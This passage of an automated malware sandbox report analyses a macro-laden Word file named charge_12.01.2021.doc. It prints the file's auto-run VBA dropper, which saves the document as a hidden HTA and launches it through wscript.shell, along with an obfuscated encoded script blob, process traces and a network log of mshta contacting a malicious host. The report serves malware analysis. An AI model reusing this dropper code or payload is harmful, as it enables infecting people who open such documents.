                Preview: <html><body><div id='karolYou' style='font-color: #000'>lave</div><div id='tubeGirl' style='font-color: #000'>=YXYyBCZvdXWvVHI9AibldHIBNGdpZXZY9kYqV2Y0hiItNHetxmMugXbshGd0BnIpsDZvdXWvVnLvBXZuhiIHVEViwCIigGd0BnOv8ydp5mcl5Gdhx2cyATM3ImLj9WbvQXZnp3LRJzN3E2R3Y0aOlDcBNWYXRkZGx2ROJUZ1FWcHVGZ4k2LiF2VlhHVR92R5FUQ6xkUvEUVxgVRyJXVxYUa0pmaWhjQCFWU1VWb2UzctFFWZZXek9iN0AjNz8yZ2YmSZx0RIJlVXB3NzFDd2hkbaRmdvg1YqNWWDpmQYhDdQFWQMNHapRUQ4hTNQVUcvMWYiNzPyVmZ9ADdmclePpVP5gXeBlGZOZiezQWOPJGM9U0dBV1aVVlT5h0crZSdzVmc9QjWrlHO54mJjlGZ9IWR1klQPZUeaZ3VIJ2R2lzdQJ3NRZVbmEXPsl1anplTHl1baBXd5ICLgYWYsNXZpsDZvdXWvVnLzVmbkhSK7kmZoQ2b3l1b15yc0FGd1NHI90DIyADMpsHdyl3e2FmcgcWayxGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKiEGZvRmYuMHdyVWYtJSK7cWayxGTvZXZu8Gcl52Onlmcsx0b2VmL0lHclBSPgEzOnlmcsx0b2VmL3JXa0VGKk92dZ9WduIXZzB3buNXZi9GZ5lyOnlmcsx0b2VmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcR2b35UZ4RnLqB3ZiwCIykyOnlmcsx0b2VmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHIs9mdlxUarVGI9AibldHIBNGdpZXZY9kYqV2Y0hiI3N3YylGc05ycoVGbsJSK7YXYyByahJ3bsR0b3B1b3BS
                C:\Users\user\Documents\~$ouTube.hta
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\user\Documents\~WRD0000.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):3342
                Entropy (8bit):5.787478297876638
                Encrypted:false
                SSDEEP:96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8
                MD5:55D9EAB53D4063A53B6ED05F7B1E75E7
                SHA1:E6B4C81676D3EF0D2F7D08A6CC2AD90EB54908C3
                SHA-256:C7F40608CE8A3DDA25C13D117790D08EF757B07B8C2CCB645A27A71ADC322FB2
                SHA-512:E90768D87C7B191D41D3944957725DB0E1F29FA865E24FD7308656FC9249CA0A5D1BD0ABEDA3BBC68528EFC0CE6BC3A79EB434C375FD5C6EC90455C6E19A74F9
                Malicious:false
                Preview: <html><body><div id='karolYou' style='font-color: #000'>lave</div><div id='tubeGirl' style='font-color: #000'>=YXYyBCZvdXWvVHI9AibldHIBNGdpZXZY9kYqV2Y0hiItNHetxmMugXbshGd0BnIpsDZvdXWvVnLvBXZuhiIHVEViwCIigGd0BnOv8ydp5mcl5Gdhx2cyATM3ImLj9WbvQXZnp3LRJzN3E2R3Y0aOlDcBNWYXRkZGx2ROJUZ1FWcHVGZ4k2LiF2VlhHVR92R5FUQ6xkUvEUVxgVRyJXVxYUa0pmaWhjQCFWU1VWb2UzctFFWZZXek9iN0AjNz8yZ2YmSZx0RIJlVXB3NzFDd2hkbaRmdvg1YqNWWDpmQYhDdQFWQMNHapRUQ4hTNQVUcvMWYiNzPyVmZ9ADdmclePpVP5gXeBlGZOZiezQWOPJGM9U0dBV1aVVlT5h0crZSdzVmc9QjWrlHO54mJjlGZ9IWR1klQPZUeaZ3VIJ2R2lzdQJ3NRZVbmEXPsl1anplTHl1baBXd5ICLgYWYsNXZpsDZvdXWvVnLzVmbkhSK7kmZoQ2b3l1b15yc0FGd1NHI90DIyADMpsHdyl3e2FmcgcWayxGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKiEGZvRmYuMHdyVWYtJSK7cWayxGTvZXZu8Gcl52Onlmcsx0b2VmL0lHclBSPgEzOnlmcsx0b2VmL3JXa0VGKk92dZ9WduIXZzB3buNXZi9GZ5lyOnlmcsx0b2VmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcR2b35UZ4RnLqB3ZiwCIykyOnlmcsx0b2VmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHIs9mdlxUarVGI9AibldHIBNGdpZXZY9kYqV2Y0hiI3N3YylGc05ycoVGbsJSK7YXYyByahJ3bsR0b3B1b3BS

                Static File Info

                General

                File type:Microsoft Word 2007+
                Entropy (8bit):7.789270534017578
                TrID:
                • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                • ZIP compressed archive (8000/1) 5.23%
                File name:charge_12.01.2021.doc
                File size:34322
                MD5:18499830201cddade8183b8e24fdf30a
                SHA1:55c498cf7273cab567f49a00c15ca3316c001215
                SHA256:0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5
                SHA512:0a59ed2f3491bbd547d3ae543c6efcf965d1da65c02f900b09d6c75afd92dfc98c4182af7392b9d77b79cf0c17fe30d232449396a3a3be14c96b07ce7718928e
                SSDEEP:768:JouYXWQ6W02VWnZdw9822zARtrLfxl1Isq:mLmxfcWwkyNLfx4
                File Content Preview:PK..........!...O.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "/opt/package/joesandbox/database/analysis/532355/sample/charge_12.01.2021.doc"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Title:
                Subject:
                Author:aqbhmx
                Keywords:ath.ebuTuoy
                Template:Normal
                Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
                Revion Number:2
                Total Edit Time:0
                Create Time:2021-12-01T11:28:00Z
                Last Saved Time:2021-12-01T11:28:00Z
                Number of Pages:1
                Number of Words:116
                Number of Characters:9905
                Creating Application:Microsoft Office Word
                Security:0

                Document Summary

                Number of Lines:55
                Number of Paragraphs:1
                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0000

                Streams with VBA

                VBA File Name: ThisDocument.cls, Stream Size: 2131
                General
                Stream Path:VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:2131
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . " . . . 0 . . . . . . . . . . . . . . . - $ " 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . 1 . , . . . I . C + . . . . . . . 1 . . . . M . . . . , 1 ] \\ . . . . . . . . . . . . . . . . . . . . . 4 . . . . . J . . . . I 9 . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 4 . . . . . J . . . . I 9 . : . 1 . , . . . I . C + . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 06 00 01 00 00 f4 04 00 00 e4 00 00 00 ea 01 00 00 22 05 00 00 30 05 00 00 c0 06 00 00 03 00 00 00 01 00 00 00 2d 24 22 31 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 96 31 f1 2c da ac df 49 b1 43 2b df da 14 fc be e0 d7 31 ff fb e4 a3 4d b5 cc 09 86 2c 31 5d 5c 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "ThisDocument"
                Attribute VB_Base = "1Normal.ThisDocument"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = True
                Attribute VB_Customizable = True
                
                Function contents()
                ActiveDocument.Content.Find.Execute FindText:="@1", ReplaceWith:="", Replace:=2
                End Function
                Function keywords()
                keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value
                contents
                End Function
                Public Function s(youDoorNext, youLoad)
                Set powGirlDow = CreateObject(youDoorNext).exec("explorer " & youLoad)
                End Function
                VBA File Name: main.bas, Stream Size: 1148
                General
                Stream Path:VBA/main
                VBA File Name:main.bas
                Stream Size:1148
                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - $ . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 a1 03 00 00 00 00 00 00 01 00 00 00 2d 24 9c 41 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "main"
                Public Sub autoopen()
                lovePowGirl = StrReverse(ThisDocument.keywords)
                With ActiveDocument
                .SaveAs2 FileName:=lovePowGirl, FileFormat:=2
                End With
                ThisDocument.s StrReverse("llehs.tpircsw"), lovePowGirl
                End Sub

                Streams

                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 406
                General
                Stream Path:PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:406
                Entropy:5.30459067678
                Base64 Encoded:True
                Data ASCII:I D = " { 4 C 4 C B 6 7 3 - B F A 3 - 4 F 2 A - A F 5 A - A 6 3 2 A C 7 9 3 7 5 A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 F 9 D 8 D 3 0 B 3 5 0 5 6 5 4 5 6 5 4 5 6 5 4 5 6 5 4 " . . D P B = " 3 E 3 C 2 C D 1 5 4 E F F 2 F 0 F 2 F 0 F 2 " . . G C = " D D D F C F 6 E F 1 0 C F 2 0 C F 2 F 3 " . . . . [
                Data Raw:49 44 3d 22 7b 34 43 34 43 42 36 37 33 2d 42 46 41 33 2d 34 46 32 41 2d 41 46 35 41 2d 41 36 33 32 41 43 37 39 33 37 35 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
                Stream Path: PROJECTwm, File Type: data, Stream Size: 56
                General
                Stream Path:PROJECTwm
                File Type:data
                Stream Size:56
                Entropy:3.05665670746
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00
                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2864
                General
                Stream Path:VBA/_VBA_PROJECT
                File Type:data
                Stream Size:2864
                Entropy:4.29981377884
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1667
                General
                Stream Path:VBA/__SRP_0
                File Type:data
                Stream Size:1667
                Entropy:3.52769533528
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . O - . . % . J . i . . x - a ] . . . . . . . . . . .
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 232
                General
                Stream Path:VBA/__SRP_1
                File Type:data
                Stream Size:232
                Entropy:2.20499301264
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y o u D o o r N e x t . . . . . . . . . . . . . . . . y o u L o a d X . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 799
                General
                Stream Path:VBA/__SRP_2
                File Type:data
                Stream Size:799
                Entropy:1.96552857808
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 03 00 03 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 314
                General
                Stream Path:VBA/__SRP_3
                File Type:data
                Stream Size:314
                Entropy:2.19683844969
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                Stream Path: VBA/dir, File Type: data, Stream Size: 552
                General
                Stream Path:VBA/dir
                File Type:data
                Stream Size:552
                Entropy:6.3505975093
                Base64 Encoded:True
                Data ASCII:. $ . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . t . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                Data Raw:01 24 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 f6 74 a0 63 0d 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 04:20:15.383035898 CET4916580192.168.2.22194.62.42.207
                Dec 2, 2021 04:20:15.472258091 CET8049165194.62.42.207192.168.2.22
                Dec 2, 2021 04:20:15.472520113 CET4916580192.168.2.22194.62.42.207
                Dec 2, 2021 04:20:15.765425920 CET4916580192.168.2.22194.62.42.207
                Dec 2, 2021 04:20:15.854682922 CET8049165194.62.42.207192.168.2.22
                Dec 2, 2021 04:20:16.313687086 CET8049165194.62.42.207192.168.2.22
                Dec 2, 2021 04:20:16.313941002 CET4916580192.168.2.22194.62.42.207
                Dec 2, 2021 04:20:20.341320992 CET4916580192.168.2.22194.62.42.207

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 04:20:15.315145016 CET5216753192.168.2.228.8.8.8
                Dec 2, 2021 04:20:15.352807045 CET53521678.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Dec 2, 2021 04:20:15.315145016 CET192.168.2.228.8.8.80x92e6Standard query (0)winrentals2017b.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Dec 2, 2021 04:20:15.352807045 CET8.8.8.8192.168.2.220x92e6No error (0)winrentals2017b.com194.62.42.207A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • winrentals2017b.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249165194.62.42.20780C:\Windows\SysWOW64\mshta.exe
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 04:20:15.765425920 CET0OUTGET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: winrentals2017b.com
                Connection: Keep-Alive
                Dec 2, 2021 04:20:16.313687086 CET1INHTTP/1.1 200 OK
                Date: Thu, 02 Dec 2021 03:20:15 GMT
                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                X-Powered-By: PHP/7.2.34
                Content-Length: 203
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 63 61 62 33 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "cab3" was not found on this server.</p></body></html>


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:04:20:12
                Start date:02/12/2021
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Imagebase:0x13f410000
                File size:1423704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:04:20:16
                Start date:02/12/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:explorer youTube.hta
                Imagebase:0xffa10000
                File size:3229696 bytes
                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:04:20:17
                Start date:02/12/2021
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                Imagebase:0xffa10000
                File size:3229696 bytes
                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:04:20:17
                Start date:02/12/2021
                Path:C:\Windows\SysWOW64\mshta.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta"
                Imagebase:0xe10000
                File size:13312 bytes
                MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Call Graph

                Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
                callgraph 9 contents Execute:1 22 keywords 22->9 34 s exec:1 51 autoopen ActiveDocument:1,StrReverse:2 51->22 51->34

                Module: ThisDocument

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisDocument"

                2

                Attribute VB_Base = "1Normal.ThisDocument"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = True

                8

                Attribute VB_Customizable = True

                Executed Functions
                APIsMeta Information

                exec

                IWshShell3.exec("explorer youTube.hta")
                StringsDecrypted Strings
                "explorer "
                LineInstructionMeta Information
                17

                Public Function s(youDoorNext, youLoad)

                18

                Set powGirlDow = CreateObject(youDoorNext).exec("explorer " & youLoad)

                IWshShell3.exec("explorer youTube.hta")

                executed
                19

                End Function

                APIsMeta Information

                BuiltInDocumentProperties

                Part of subcall function contents@ThisDocument: Execute

                StringsDecrypted Strings
                "keywords"
                LineInstructionMeta Information
                13

                Function keywords()

                14

                keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value

                BuiltInDocumentProperties

                executed
                15

                contents

                16

                End Function

                APIsMeta Information

                Execute

                StringsDecrypted Strings
                """"
                "@1"
                LineInstructionMeta Information
                10

                Function contents()

                11

                ActiveDocument.Content.Find.Execute FindText := "@1", ReplaceWith := "", Replace := 2

                Execute

                executed
                12

                End Function

                Module: main

                Declaration
                LineContent
                1

                Attribute VB_Name = "main"

                Executed Functions
                APIsMeta Information

                StrReverse

                StrReverse("ath.ebuTuoy") -> youTube.hta

                Part of subcall function keywords@ThisDocument: BuiltInDocumentProperties

                Part of subcall function s@ThisDocument: exec

                StrReverse

                StrReverse("llehs.tpircsw") -> wscript.shell
                StringsDecrypted Strings
                "llehs.tpircsw"
                LineInstructionMeta Information
                2

                Public Sub autoopen()

                3

                lovePowGirl = StrReverse(ThisDocument.keywords)

                StrReverse("ath.ebuTuoy") -> youTube.hta

                executed
                4

                With ActiveDocument

                5

                . SaveAs2 FileName := lovePowGirl, FileFormat := 2

                6

                End With

                7

                ThisDocument.s StrReverse("llehs.tpircsw"), lovePowGirl

                StrReverse("llehs.tpircsw") -> wscript.shell

                executed
                8

                End Sub

                Reset < >

                  Executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.529653632.00000000068E1000.00000040.00000001.sdmp, Offset: 068E1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ca3f7c519e96159a28ef77e70662954c3f93d931a60b4f853ff3a0168477c374
